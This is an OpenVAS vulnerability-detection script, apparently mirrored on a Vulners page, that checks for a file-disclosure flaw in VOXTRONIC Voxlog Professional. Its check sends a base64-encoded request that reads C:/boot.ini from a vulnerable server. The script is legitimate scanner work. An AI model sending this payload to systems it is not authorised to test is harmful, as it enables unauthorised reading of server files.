Lucene search
K

VOXTRONIC Voxlog Professional Multiple Security Vulnerabilities

🗓️ 20 Feb 2012 00:00:00Reported by This script is Copyright (C) 2012 Greenbone Networks GmbHType 
openvas
 openvas
🔗 plugins.openvas.org👁 12 Views

VOXTRONIC Voxlog Professional Security Vulnerabilitie

Refs
Code
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_voxtronic_voxlog_52081.nasl 5956 2017-04-14 09:02:12Z teissa $
#
# VOXTRONIC Voxlog Professional Multiple Security Vulnerabilities
#
# Authors:
# Michael Meyer <[email protected]>
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_summary = "VOXTRONIC Voxlog Professional is prone to a file-disclosure
vulnerability and multiple SQL-injection vulnerabilities because it
fails to properly sanitize user-supplied input.

An remote attacker can exploit these issues to obtain potentially
sensitive information from local files on computers running the
vulnerable application, or modify the logic of SQL queries. A
successful exploit may allow the attacker to compromise the
software, retrieve information, or modify data; These may aid in
further attacks.

VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable;
other versions may also be affected.";


if (description)
{
 script_id(103430);
 script_bugtraq_id(52081);
 script_version ("$Revision: 5956 $");
 script_tag(name:"cvss_base", value:"7.5");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");

 script_name("VOXTRONIC Voxlog Professional Multiple Security Vulnerabilities");

 script_xref(name : "URL" , value : "http://www.securityfocus.com/bid/52081");
 script_xref(name : "URL" , value : "http://www.voxtronic.com/");

 script_tag(name:"last_modification", value:"$Date: 2017-04-14 11:02:12 +0200 (Fri, 14 Apr 2017) $");
 script_tag(name:"creation_date", value:"2012-02-20 14:56:07 +0100 (Mon, 20 Feb 2012)");
 script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
 script_family("Web application abuses");
 script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
 script_dependencies("find_service.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_tag(name : "summary" , value : tag_summary);
 exit(0);
}

include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");
include("global_settings.inc");
   
port = get_http_port(default:80);
if(!get_port_state(port))exit(0);

if(!can_host_php(port:port))exit(0);

dirs = make_list("/voxlog","/voxalert");

foreach dir (dirs) {
   
  url = string(dir, "/oben.php"); 

  if(http_vuln_check(port:port, url:url,pattern:"<title>(voxLog|voxAlert)")) {

    url = dir + "/GET.PHP?v=ZmlsZT1DOi9ib290LmluaQ=="; # file=C:/boot.ini
    
    if(http_vuln_check(port:port, url:url,pattern:"\[boot loader\]")) {
      security_message(port:port);
      exit(0);
    }  

  }
}

exit(0);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation